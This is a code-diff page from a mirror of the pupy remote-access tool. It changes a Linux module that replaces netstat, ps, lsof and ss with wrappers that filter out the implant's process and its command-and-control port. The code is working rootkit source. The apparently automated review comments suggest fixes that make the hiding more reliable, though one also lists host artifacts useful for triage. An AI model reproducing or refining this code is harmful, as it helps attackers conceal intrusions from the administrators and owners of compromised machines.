mirror of https://github.com/n1nj4sec/pupy.git
Merge branch 'RedSunEmpire-master' into dev
commit
5d72cfaac5
|
@ -1,31 +1,23 @@
|
|||
#!/usr/bin/env python
|
||||
from pupylib.PupyModule import *
|
||||
from pupylib.utils.rpyc_utils import redirected_stdio
|
||||
|
||||
__class_name__="SetStealth"
|
||||
def print_callback(data):
|
||||
sys.stdout.write(data)
|
||||
sys.stdout.flush()
|
||||
|
||||
@config(cat="manage", compat="unix")
|
||||
@config(compat="linux", cat="manage")
|
||||
class SetStealth(PupyModule):
|
||||
"""Hides the runnin process from netstat, ss, ps, lsof by using modified binaries. Be careful when choosing the port.
|
||||
"""Hides the runnin process from netstat, ss, ps, lsof by using modified binaries.
|
||||
Credits to: http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
|
||||
|
||||
********************** /!\ WARNING /!\ **********************
|
||||
* Do NOT run the stealh module more than ONCE on a machine. *
|
||||
* Running it two times will brake the binaries. *
|
||||
*************************************************************
|
||||
NOTE: The pp.py script needs to be running with root privileges in order to run this module."""
|
||||
Demo: https://vimeo.com/157356150"""
|
||||
dependencies=["linux_stealth"]
|
||||
def init_argparse(self):
|
||||
self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__)
|
||||
self.arg_parser.add_argument('port', type=int, help='The port number to which Pupy is connecting to.')
|
||||
self.arg_parser.add_argument('--port', default=None, help='The port number to which Pupy is connecting to.')
|
||||
|
||||
def is_compatible(self):
|
||||
a,r=super(SetStealth, self).is_compatible()
|
||||
if not a:
|
||||
return False, r
|
||||
if self.client.conn.modules['subprocess'].check_output(r"ls -l `dirname \`which netstat\``/net*tat | wc -l", shell=True).strip() == "2":
|
||||
return False, "It looks like this module has already been run on this machine."
|
||||
return True, ""
|
||||
|
||||
def run(self, args):
|
||||
self.client.load_package("linux_stealth")
|
||||
self.client.conn.modules['linux_stealth'].run(str(args.port))
|
||||
with redirected_stdio(self.client.conn):
|
||||
self.client.conn.modules['linux_stealth'].run(args.port)
|
||||
self.success("Module executed successfully.")
|
||||
|
|
|
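Review bot: `add_argument('--port', default=None, …)` in `init_argparse` has no `type=`, so the value reaches `linux_stealth.run(args.port)` as an unchecked string, and the second file on this page concatenates `port` into a shell script and a `grep` pattern. The +/- markers are lost here, so this assumes the `--port` line and the `with redirected_stdio(...)` call are the new side. If so, keep the numeric check with `add_argument('--port', type=int, default=None, ...)` and convert at the call site with `port = None if args.port is None else str(args.port)`. The shorter docstring variant also drops the warning that a second run breaks the replaced binaries and the note that root is required. That caveat should stay documented, especially if the `is_compatible` check shown in this section is being removed.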
@ -1,36 +1,50 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
import os
|
||||
import sys
|
||||
import subprocess
|
||||
import os
|
||||
import time
|
||||
|
||||
def cmd_exists(cmd):
|
||||
return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
|
||||
|
||||
def run(port):
|
||||
if cmd_exists("gcc") == True:
|
||||
bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'"""
|
||||
#subprocess.call(bash, shell=True)
|
||||
with open('/tmp/b', 'w') as f:
|
||||
f.write(bash)
|
||||
os.system("bash /tmp/b")
|
||||
time.sleep(3)
|
||||
os.remove("/tmp/b")
|
||||
else:
|
||||
bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'"""
|
||||
with open("/tmp/p", "w") as f:
|
||||
f.write(bash)
|
||||
os.system("bash /tmp/p")
|
||||
time.sleep(3)
|
||||
os.remove("/tmp/p")
|
||||
bashss="""#!/bin/bash
|
||||
def run(port=None):
|
||||
if port is None:
|
||||
try:
|
||||
import pupy
|
||||
host, port=pupy.get_connect_back_host().split(":")
|
||||
except:
|
||||
raise Exception("pupy connect back port couldn't be found, please precise it manually")
|
||||
|
||||
print "hidding port %s ..."%port
|
||||
|
||||
a=subprocess.check_output(["netstat", "-tn"])
|
||||
if port in a:
|
||||
def cmd_exists(cmd):
|
||||
return subprocess.call("type " + cmd, shell=True,
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
|
||||
if cmd_exists("gcc") == True:
|
||||
bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'"""
|
||||
with open('/tmp/b', 'w') as f:
|
||||
f.write(bash)
|
||||
f.close()
|
||||
os.system("bash /tmp/b")
|
||||
time.sleep(3)
|
||||
os.remove("/tmp/b")
|
||||
else:
|
||||
bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'"""
|
||||
with open("/tmp/p", "w") as f:
|
||||
f.write(bash)
|
||||
f.close()
|
||||
os.system("bash /tmp/p")
|
||||
time.sleep(3)
|
||||
os.remove("/tmp/p")
|
||||
bashss="""#!/bin/bash
|
||||
/bin/zss $* | grep -v """+port
|
||||
get_ss_path=subprocess.check_output('which ss', shell=True)
|
||||
path=get_ss_path[:-3]
|
||||
os.system("mv "+path+"ss "+path+"zss")
|
||||
with open(path+"ss", "w") as newss:
|
||||
newss.write(bashss)
|
||||
os.system("chmod +x "+path+"ss")
|
||||
#blazo - fresh orange
|
||||
#brock - september 22nd
|
||||
#Creds to: www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/
|
||||
get_ss_path=subprocess.check_output('which ss', shell=True)
|
||||
path=get_ss_path[:-3]
|
||||
os.system("mv "+path+"ss "+path+"zss")
|
||||
with open(path+"ss", "w") as newss:
|
||||
newss.write(bashss)
|
||||
newss.close()
|
||||
os.system("chmod +x "+path+"ss")
|
||||
else:
|
||||
print "port is already hidden"
|
||||
|
|
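Review bot: The bare `except:` around `pupy.get_connect_back_host().split(":")` in `run(port=None)` hides every failure behind one message, including the unpacking `ValueError` raised when the host string contains more than one colon (an IPv6 literal, for instance). Catching named exceptions such as `except (ImportError, ValueError):` and splitting with `rsplit(":", 1)` would keep real errors visible; the `f.close()` and `newss.close()` calls inside the `with` blocks are redundant. The guard `if port in a` is a substring test over the whole `netstat -tn` output, so `80` also matches `8080` or digits inside an address. Nothing in this file restores the renamed `netstat`, `ps`, `lsof` and `ss`, so a wrong result from that guard leaves the host's tools broken. For anyone triaging a host, the artifacts visible in this code are the renamed originals, the `zss` copy beside a shell-script `ss`, and the transient `/tmp/b` or `/tmp/p` file.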